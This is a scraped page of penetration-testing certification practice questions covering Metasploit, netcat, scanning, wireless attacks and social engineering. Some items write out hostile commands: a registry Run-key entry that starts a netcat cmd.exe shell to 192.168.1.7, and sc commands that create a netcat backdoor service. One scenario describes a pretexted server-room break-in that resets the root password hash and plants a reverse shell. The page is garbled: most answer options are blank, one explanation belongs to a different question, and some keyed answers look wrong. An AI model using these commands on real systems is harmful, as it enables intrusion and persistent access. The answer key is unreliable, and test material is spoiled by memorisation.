You have compromised a Windows workstation using Metasploit and have injected the Meterpreter payload into the svchost process. After modifying some files to set up a persistent backdoor you realize that you will need to change the modified and access times of the files to ensure that the administrator can't see the changes you made. Which Meterpreter module would you need to load in order to do this?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
You work as a Network Administrator for Tech Perfect Inc. The company has a Windows Active Directory-based single domain single forest network. The functional level of the forest is Windows Server 2003. The company has recently provided laptops to its sales team members. You have configured access points in the network to enable a wireless network. The company's security policy states that all users using laptops must use smart cards for authentication. Which of the following authentication techniques will you use to implement the security policy of the company?
-
A
IEEE 802.1X using EAP-TLS
-
B
IEEE 802.1X using PEAP-MS-CHAP
-
C
-
D
Reveal answer details
Close answer details
Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure. com Website. The we-are-secure.com Web server is using Linux operating system. When you port scanned the we-are-secure.com Web server, you got that TCP port 23, 25, and 53 are open. When you tried to telnet to port 23, you got a blank screen in response. When you tried to type the dir, copy, date, del, etc. commands you got only blank spaces or underscores symbols on the screen. What may be the reason of such unwanted situation?
-
A
The we-are-secure.com server is using honeypot.
-
B
The we-are-secure.com server is using a TCP wrapper.
-
C
The telnet service of we-are-secure.com has corrupted.
-
D
The telnet session is being affected by the stateful inspection firewall.
Reveal answer details
Close answer details
Which of the following tools is not a BlueSnarf attacking tool?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Which of the following is the most common method for an attacker to spoof email?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Which protocol would need to be available on a target in order for Nmap to identify services like IMAPS and POP3S?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerB
Explanationany protocol with a leading/trailing S piggybacks on SSL/TLS
Question 8
Fill in the blank
Fill in the blank with the appropriate word. ____is a port scanner that can also be used for the OS detection. A. Nmap
Reveal answer details
Close answer details
You want to retrieve password files (stored in the Web server's index directory) from various Web sites. Which of the following tools can you use to accomplish the task?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 10
Single choice
Which of the following Penetration Testing steps includes network mapping and OS fingerprinting?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 11
Single choice
You want to retrieve the default security report of nessus. Which of the following google search queries will you use?
-
A
link:pdf nessus "Assessment report"
-
B
-
C
filetype:pdf "Assessment Report" nessus
-
D
site:pdf nessus "Assessment report"
Reveal answer details
Close answer details
Question 12
Single choice
Which of the following is generally practiced by the police or any other recognized governmental authority?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 13
Single choice
While scanning a remote system that is running a web server with a UDP scan and monitoring the scan with a sniffer, you notice that the target is responding with ICMP Port Unreachable only once a second What operating system is the target likely running?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 14
Multiple choice
You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Each correct answer represents a complete solution. Choose all that apply.
-
A
You want to put Netcat in the stealth mode.
-
B
You want to add the Netcat command to the Windows registry.
-
C
You want to perform banner grabbing.
-
D
You want to set the Netcat to execute command any time.
Reveal answer details
Close answer details
Question 15
Single choice
Peter, a malicious hacker, obtains e-mail addresses by harvesting them from postings, blogs, DNS listings, and Web pages. He then sends large number of unsolicited commercial e-mail (UCE) messages on these addresses. Which of the following e-mail crimes is Peter committing?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 16
Single choice
Which of the following Nmap commands is used to perform a UDP port scan?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 17
Single choice
Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 18
Single choice
Which of the following standards is used in wireless local area networks (WLANs)?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 19
Single choice
Which of the following is a Windows-based tool that is used for the detection of wireless LANs using the IEEE 802.11a, 802.11b, and 802.11g standards and also detects wireless networks marking their relative position with a GPS?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 20
Single choice
Which of the following techniques is used to monitor telephonic and Internet conversations by a third party?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 21
Single choice
Which of the following best describes a server side exploit?
-
A
Attack on the physical machine
-
B
Attack of a service listening on a network port
-
C
Attack that escalates user privilege to root or administrator
-
D
Attack of a client application that retrieves content from the network
Reveal answer details
Close answer details
Question 22
Single choice
In which of the following scanning methods does an attacker send SYN packets and then a RST packet?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 23
Multiple choice
You work as a professional Ethical Hacker. You are assigned a project to perform blackhat testing on www.we-are-secure.com. You visit the office of we-are-secure.com as an air-condition mechanic. You claim that someone from the office called you saying that there is some fault in the air-conditioner of the server room. After some inquiries/arguments, the Security Administrator allows you to repair the air-conditioner of the server room. When you get into the room, you found the server is Linux-based. You press the reboot button of the server after inserting knoppix Live CD in the CD drive of the server. Now, the server promptly boots backup into Knoppix. You mount the root partition of the server after replacing the root password in the /etc/shadow file with a known password hash and salt. Further, you copy the netcat tool on the server and install its startup files to create a reverse tunnel and move a shell to a remote server whenever the server is restarted. You simply restart the server, pull out the Knoppix Live CD from the server, and inform that the air-conditioner is working properly. After completing this attack process, you create a security auditing report in which you mention various threats such as social engineering threat, boot from Live CD, etc. and suggest the countermeasures to stop booting from the external media and retrieving sensitive data. Which of the following steps have you suggested to stop booting from the external media and retrieving sensitive data with regard to the above scenario? Each correct answer represents a complete solution. Choose two.
-
A
Setting only the root level access for sensitive data.
-
B
Encrypting disk partitions.
-
C
-
D
Using password protected hard drives.
Reveal answer details
Close answer details
Question 24
Single choice
While reviewing traffic from a tcpdump capture, you notice the following commands being sent from a remote system to one of your web servers: C:\>sc winternet.host.com create ncservice binpath- "c:\tools\ c.exe -I -p 2222 -e cmd.exe" C:\>sc vJnternet.host.com query ncservice. What is the intent of the commands?
-
A
The first command creates a backdoor shell as a service. It is being started on TCP2222 using cmd.exe. The second command verifies the service is created and itsstatus.
-
B
The first command creates a backdoor shell as a service. It is being started on UDP2222 using cmd.exe. The second command verifies the service is created and itsstatus.
-
C
This creates a service called ncservice which is linked to the cmd.exe command andits designed to stop any instance of nc.exe being run. The second command verifiesthe service is created and its status.
-
D
The first command verifies the service is created and its status. The secondcommand creates a backdoor shell as a service. It is being started on TCP 2222connected to cmd.exe.
Reveal answer details
Close answer details
Question 25
Single choice
Which of the following attacks can be overcome by applying cryptography?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 26
Single choice
Adam is a novice Internet user. He is using Google search engine to search documents of his interest. Adam wants to search the text present in the link of a Website. Which of the following operators will he use in his query to accomplish the task?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 27
Single choice
Which of the following tasks is NOT performed into the enumeration phase?
-
A
Discovering NetBIOS names
-
B
Obtaining Active Directory information and identifying vulnerable user accounts
-
C
Injecting a backdoor to the remote computer to gain access in it remotely
-
D
Establishing NULL sessions and queries
Reveal answer details
Close answer details
Question 28
Multiple choice
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He enters the following command on the Linux terminal:chmod 741 secure.c Considering the above scenario, which of the following statements are true? Each correct answer represents a complete solution. Choose all that apply.
-
A
John is restricting a guest to only write or execute the secure.c file.
-
B
John is providing all rights to the owner of the file.
-
C
By the octal representation of the file access permission, John is restricting the group members to only read the secure.c file.
-
D
The textual representation of the file access permission of 741 will be -rwxr--rw-.
Reveal answer details
Close answer details
Question 29
Multiple choice
The employees of CCN Inc. require remote access to the company's proxy servers. In order to provide solid wireless security, the company uses LEAP as the authentication protocol. Which of the following is supported by the LEAP protocol? Each correct answer represents a complete solution. Choose all that apply.
-
A
-
B
-
C
Password hash for client authentication
-
D
Public key certificate for server authentication
Reveal answer details
Close answer details
Question 30
Single choice
Which of the following file transfer programs will automatically convert end-of line characters between different platforms when placed in ASCII Mode?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerA
ExplanationReferences: https://wiki.filezilla-project.org/Data_Type
Question 31
Single choice
Which of the following best describes a client side exploit?
-
A
Attack of a client application that retrieves content from the network
-
B
Attack that escalates user privileged to root or administrator
-
C
Attack of a service listening on a client system
-
D
Attack on the physical machine
Reveal answer details
Close answer details
Correct answerA
ExplanationThe correct answer is A. The first command creates a backdoor shell as a service. It is being started on TCP 2222 using cmd.exe. The second command verifies the service is created and its status. Here's why the other answers are incorrect: B. The first part of the answer is correct in that it creates a backdoor shell as a service. However, it incorrectly states that it is being started on UDP 2222. The command provided specifies the "-p 2222" flag, which indicates a TCP port rather than a UDP port. C. This answer is incorrect because it misinterprets the purpose of the ncservice. It is not designed to stop any instance of nc.exe. Instead, it creates a backdoor shell as a service, as stated in answer A. D. This answer has the commands' purposes switched. The first command is not verifying the service's status; it is creating the backdoor shell. The second command is incomplete and does not provide enough information to determine its purpose.
Question 32
Single choice
In which of the following attacks does the attacker overload the CAM table of the switch?
-
A
-
B
-
C
Monkey-in-the-middle attack
-
D
Reveal answer details
Close answer details
Question 33
Single choice
You want to use a Windows-based GUI tool which can perform MITM attacks, along with sniffing and ARP poisoning. Which of the following tools will you use?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 34
Single choice
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He wants to perform a stealth scan to discover open ports and applications running on the We-are-secure server. For this purpose, he wants to initiate scanning with the IP address of any third party. Which of the following scanning techniques will John use to accomplish his task?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 35
Single choice
You are conducting a penetration test for a private company located in Canada. The scope extends to all internal-facing hosts controlled by the company. You have gathered necessary hold-harmless and non-disclosure agreements. Which action by your group can incur criminal liability under Criminal Code of Canada Sections 184 and 542 CC 184?
-
A
Analyzing internal firewall router software for vulnerabilities
-
B
Exploiting application vulnerabilities on end-user workstations
-
C
Attempting to crack passwords on a development server
-
D
Capturing a VoIP call to a third party without prior notice
Reveal answer details
Close answer details
Question 36
Multiple choice
Which of the following statements are true about session hijacking? Each correct answer represents a complete solution. Choose all that apply.
-
A
It is used to slow the working of victim's network resources.
-
B
TCP session hijacking is when a hacker takes over a TCP session between two machines.
-
C
Use of a long random number or string as the session key reduces session hijacking.
-
D
It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.
Reveal answer details
Close answer details
Question 37
Single choice
Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using Alternate Data Streams (ADS) feature. Which of the following statements is true in context with the above scenario?
-
A
Adam is using NTFS file system.
-
B
Alternate Data Streams is a feature of Linux operating system.
-
C
Adam is using FAT file system.
-
D
Adam's system runs on Microsoft Windows 98 operating system.
Reveal answer details
Close answer details
Question 38
Single choice
Which of the following layers of TCP/IP model is used to move packets between the Internet Layer interfaces of two different hosts on the same link?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 39
Single choice
You want to scan your network quickly to detect live hosts by using ICMP ECHO Requests. What type of scanning will you perform to accomplish the task?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 40
Multiple choice
What happens when you scan a broadcast IP address of a network? Each correct answer represents a complete solution. Choose all that apply.
-
A
It will show an error in the scanning process.
-
B
Scanning of the broadcast IP address cannot be performed.
-
C
It may show smurf DoS attack in the network IDS of the victim.
-
D
It leads to scanning of all the IP addresses on that subnet at the same time.
Reveal answer details
Close answer details
Question 41
Multiple choice
Which of the following statements are true about the Enum tool? Each correct answer represents a complete solution. Choose all that apply.
-
A
It is capable of performing brute force and dictionary attacks on individual accounts of Windows NT/2000.
-
B
One of the countermeasures against the Enum tool is to disable TCP port 139/445.
-
C
It is a console-based Win32 information enumeration utility.
-
D
It uses NULL and User sessions to retrieve user lists, machine lists, LSA policy information, etc.
Reveal answer details
Close answer details
Correct answersA, B, C, D
Question 42
Single choice
You have compromised a Windows workstation using Metasploit and have injected the Meterpreter payload into the smss process. You want to dump the SAM database of the remote system so you can crack it offline. Which Meterpreter module would you need to load in addition to the defaults so that you can accomplish this?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 43
Fill in the blank
Fill in the blanks with the appropriate protocol. CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) is an IEEE___encryption protocol created to replace both TKIP and WEP. A. 802.11i
Reveal answer details
Close answer details
Question 44
Single choice
Which of the following tools is spyware that makes Windows clients send their passwords as clear text?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 45
Single choice
Which of the following tools is based on the SATAN tool?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 46
Single choice
Which of the following is a method of gathering user names from a Linux system?
-
A
Displaying the owner information of system-specific binaries
-
B
Reviewing the contents of the system log files
-
C
Gathering listening services from the xinetd configuration files
-
D
Extracting text strings from the system password file
Reveal answer details
Close answer details
Correct answerC
ExplanationReferences: https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/pdf/Security_Guide/ Red_Hat_Enterprise_Linux-6-Security_Guide-en-US.pdf
Question 47
Single choice
Which of the following is a tool for SSH and SSL MITM attacks?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 48
Single choice
When sniffing wireless frames, the interface mode plays a key role in successfully collecting traffic. Which of the mode or modes are best used for sniffing wireless traffic?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerD
ExplanationThe correct answer is D - sniffing is done in Ad-hoc for wireless AP and promiscuous for wireless cards.. https://topic.alibabacloud.com/a/the-master-managed-ad-hoc-and-monitor-modes-of-the-font-classtopic-s-color00c1dewirelessfont-font-classtopic-s-color00c1denetworkfont-font-classtopic-s-color00c1deadapterfont_8_8_32140912.html
Question 49
Single choice
Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 50
Single choice
One of the sales people in your company complains that sometimes he gets a lot of unsolicited messages on his PDA. After asking a few questions, you determine that the issue only occurs in crowded areas like airports. What is the most likely problem?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 51
Single choice
You are pen testing a Windows system remotely via a raw netcat shell. You want to quickly change directories to where the Windows operating system resides, what command could you use?
-
A
-
B
-
C
cd /systemroot/
-
D
cd %systemroot%
Reveal answer details
Close answer details
Question 52
Single choice
You suspect that system administrators In one part of the target organization are turning off their systems during the times when penetration tests are scheduled, what feature could you add to the ' Rules of engagement' that could help your team test that part of the target organization?
-
A
-
B
Tell response personnel the exact lime the test will occur
-
C
Test systems after normal business hours
-
D
Limit tests to business hours
Reveal answer details
Close answer details
Question 53
Single choice
How many bits encryption does SHA-1 use?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 54
Single choice
GSM uses either A5/1 or A5/2 stream cipher for ensuring over-the-air voice privacy. Which of the following cryptographic attacks can be used to break both ciphers?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 55
Single choice
Which of the following tools connects to and executes files on remote systems?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 56
Single choice
One of the sales people in your company complains that sometimes he gets a lot of unsolicited messages on his PDA. After asking a few questions, you determine that the issue only occurs in crowded areas like airports. What is the most likely problem?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 57
Single choice
A tester has been contracted to perform a penetration test for a corporate client. The scope of the test is limited to end-user workstations and client programs only. Which of die following actions is allowed in this test?
-
A
Attempting to redirect the internal gateway through ARP poisoning
-
B
Activating bot clients and performing a denial-of-service against the gateway.
-
C
Sniffing and attempting to crack the Domain Administrators password hash.
-
D
Sending a malicious pdf to a user and exploiting a vulnerable Reader version.
Reveal answer details
Close answer details
Correct answerD
ExplanationThe correct answer is D. D is correct for the requirement of end-user workstations and client programs. But B deviates from the scope because it targets gateways.
Question 58
Single choice
You are pen testing a system and want to use Metasploit 3.X to open a listening port on the system so you can access it via a netcat shell. Which stager would you use to have the system listen on TCP port 50000?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
|